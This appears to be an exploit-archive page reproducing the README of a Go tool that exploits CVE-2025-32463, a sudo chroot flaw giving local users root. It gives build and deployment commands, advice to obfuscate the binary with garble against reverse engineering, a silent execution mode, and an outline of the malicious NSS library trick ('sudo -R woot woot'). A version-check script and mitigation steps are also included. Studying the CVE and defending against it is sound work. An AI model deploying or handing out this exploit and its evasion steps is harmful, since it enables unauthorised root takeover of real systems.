Related vulnerability
Title:
Sudo security vulnerability
(CVE-2025-32463)
Description: Sudo is a program for Unix-like systems that lets users execute commands with special privileges in a controlled way. Sudo versions before 1.9.17p1 contain a security vulnerability: because /etc/nsswitch.conf can be read from a user-controlled directory, a local user may be able to obtain root access.
Description
This CVE addresses a vulnerability in sudo versions 1.9.14 to 1.9.17, enabling unauthorized local privilege escalation to root access.
Introduction
## CVE-2025-32463 Exploit Tool
This repository contains a Go-based exploit tool for **CVE-2025-32463**, a critical privilege escalation vulnerability (CVSS 9.3) in sudo versions **1.9.14 to 1.9.17**.
The tool allows local users to gain root access by exploiting a flaw in the `--chroot (-R)` option of sudo.
This tool is intended for **educational and testing purposes only in controlled, isolated environments**.
> **Warning**: Use this tool only in environments where you have **explicit permission** to test (e.g., virtual machines or lab setups). Unauthorized use on systems you do not own is **illegal and unethical**. Always take **snapshots** of your testing environment and **update sudo after testing**.
---
### Prerequisites
To use this tool, ensure the following are installed on your system:
- **Go**: Version 1.2 or higher
`sudo apt install golang`
- **gcc**: For compiling the malicious C library
`sudo apt install gcc`
- **libc-dev**: For C library headers
`sudo apt install libc-dev`
- **sudo**: Version between 1.9.14 and 1.9.17
- **User Permissions**: A non-privileged user with sudo access and `--chroot (-R)` allowed
- **No Security Restrictions**: SELinux/AppArmor must not block shared library loading
---
## Setup Instructions
Follow these steps to clone, compile, obfuscate, and deploy the tool securely.
### 1. Clone the Repository
```bash
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
```
---
### 2. Secure Compilation
To make reverse engineering difficult, we recommend compiling the binary with obfuscation using `garble` or optimizing Go build flags.
#### Option 1: Basic Compilation
```bash
go build -o exploit
```
#### Option 2: Obfuscated Compilation with Garble
```bash
go install mvdan.cc/garble@latest
garble -tiny -literals -seed=random build -o exploit
```
- `-tiny`: Minimizes debug information.
- `-literals`: Obfuscates string literals.
- `-seed=random`: Randomizes obfuscation for uniqueness.
#### Option 3: Optimized Go Build
```bash
go build -ldflags="-s -w" -o exploit
```
- `-s`: Strips symbol table.
- `-w`: Strips DWARF debugging info.
---
### 3. Deploy to Target System
#### Create a Test User (on the target system)
```bash
sudo adduser --home /home/testuser --shell /bin/bash testuser
sudo usermod -aG sudo testuser
```
> Ensure `--chroot (-R)` is not restricted in `/etc/sudoers`.
#### Transfer the Binary
```bash
scp exploit testuser@target:/home/testuser/exploit
```
#### Install Dependencies on Target
```bash
sudo apt update
sudo apt install gcc libc-dev
```
---
### 4. Run the Exploit
Run the binary as the non-privileged user on the target system. Available flags:
- `--help`: Show detailed usage instructions.
- `--about`: Display CVE details.
- `--execution`: Execute the exploit.
- `--silent`: Run silently without logo or process output (requires `--execution`).
#### Examples
**Show Help:**
```bash
./exploit --help
```
**Show CVE Details:**
```bash
./exploit --about
```
**Run Exploit (Normal Mode):**
```bash
./exploit --execution
```
Followed by a **root shell (`#` prompt)**.
**Run Exploit (Silent Mode):**
```bash
./exploit --execution --silent
```
> Output: None (except the root shell if successful)
---
### 5. Verify Success
In the root shell, check for root access:
```bash
id
whoami
```
**Expected Output:**
```
uid=0(root) gid=0(root) groups=0(root),1001(testuser)
root
```
---
## How It Works
The tool exploits CVE-2025-32463 by:
1. Creating a temporary directory `/tmp/sudowoot.stage.*`.
2. Generating a malicious C library `woot1337.c` that sets `uid=0`, `gid=0`, and executes `/bin/bash`.
3. Setting up a fake chroot environment with `nsswitch.conf` and `/etc/group`.
4. Compiling the C code into a shared library `libnss_/woot1337.so.2`.
5. Running `sudo -R woot woot` to load the malicious library and gain a root shell.
6. Cleaning up temporary files automatically.
> Requires: Vulnerable sudo version (1.9.14 - 1.9.17), gcc, libc-dev, and sudo -R permissions.
---
## Safety Precautions
- **Isolated Environment**: Run only in a VM or Docker container (e.g., clone PoC image from `pr0v3rbs/CVE-2025-32463_chwoot`).
- **Snapshot**: Take a VM snapshot before testing to revert changes.
- **Update After Testing**:
```bash
sudo apt update
sudo apt install sudo
```
- **Disable Chroot** (if update not possible):
```bash
echo "Defaults !use_chroot" | sudo tee -a /etc/sudoers
# appending directly bypasses visudo's syntax check; a malformed sudoers locks sudo out,
# so confirm the file still parses before logging out:
sudo visudo -c
```
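An added defender-side check, not part of this repository's code: it parses a `sudo --version` line and reports whether the installed build falls in the affected range stated above (1.9.14 through 1.9.17, fixed in 1.9.17p1). The integer version-key encoding and the `check_installed_sudo` wrapper are this example's own constructions.

```shell
#!/bin/sh
# Added defender-side check (not from the exploit repository): classify a sudo
# version string against the CVE-2025-32463 affected range
# (1.9.14 through 1.9.17; 1.9.17p1 carries the fix).

# Map "MAJOR.MINOR.PATCH[pN]" to one integer so ranges compare with -ge/-lt.
# Encoding is this example's own: major*1e9 + minor*1e6 + patch*1e3 + p-level.
sudo_version_key() {
    base=${1%%p*}                      # "1.9.17p1" -> "1.9.17"
    plevel=${1#"$base"}                # -> "p1" (or empty when no p-level)
    plevel=${plevel#p}                 # -> "1"  (or empty)
    set -- $(printf '%s\n' "$base" | tr '.' ' ')
    echo $(( ${1:-0} * 1000000000 + ${2:-0} * 1000000 + ${3:-0} * 1000 + ${plevel:-0} ))
}

# Exit 0 when the version lies in [1.9.14, 1.9.17p1), i.e. is affected.
is_sudo_vulnerable() {
    key=$(sudo_version_key "$1")
    [ "$key" -ge "$(sudo_version_key 1.9.14)" ] && [ "$key" -lt "$(sudo_version_key 1.9.17p1)" ]
}

# Pull the bare version out of the first line of `sudo --version`,
# e.g. "Sudo version 1.9.15p5" -> "1.9.15p5".
parse_sudo_version_line() {
    line=${1#Sudo version }
    printf '%s\n' "${line%% *}"
}

# Run against the installed sudo and print a verdict (exit 1 if affected,
# 2 if sudo is missing, 0 otherwise). Wrapper constructed for this example.
check_installed_sudo() {
    line=$(sudo --version 2>/dev/null | head -n 1)
    [ -n "$line" ] || { echo "sudo not found"; return 2; }
    ver=$(parse_sudo_version_line "$line")
    if is_sudo_vulnerable "$ver"; then
        echo "sudo $ver: AFFECTED by CVE-2025-32463 - upgrade to 1.9.17p1 or later"
        return 1
    fi
    echo "sudo $ver: not in the affected range"
}
```

Source the file and call `check_installed_sudo` on each host you inventory; the exit code makes it usable from configuration-management or monitoring jobs.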
---
## References
- [NVD - CVE-2025-32463](https://nvd.nist.gov/vuln/detail/CVE-2025-32463)
- [github.com/kh4sh3i](https://github.com/kh4sh3i/CVE-2025-32463)
File snapshot
[4.0K] /data/pocs/8a53135f7e4e6a8726f892632e3e4290aa759ede
├── [ 30] go.mod
├── [ 0] go.sum
├── [1.0K] LICENSE
├── [3.3K] main.go
├── [4.6K] README.md
└── [4.0K] src
└── [3.3K] cve.go
1 directory, 6 files
Notes
1. Accessing the code through the original source is recommended.
2. If the source has been removed or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.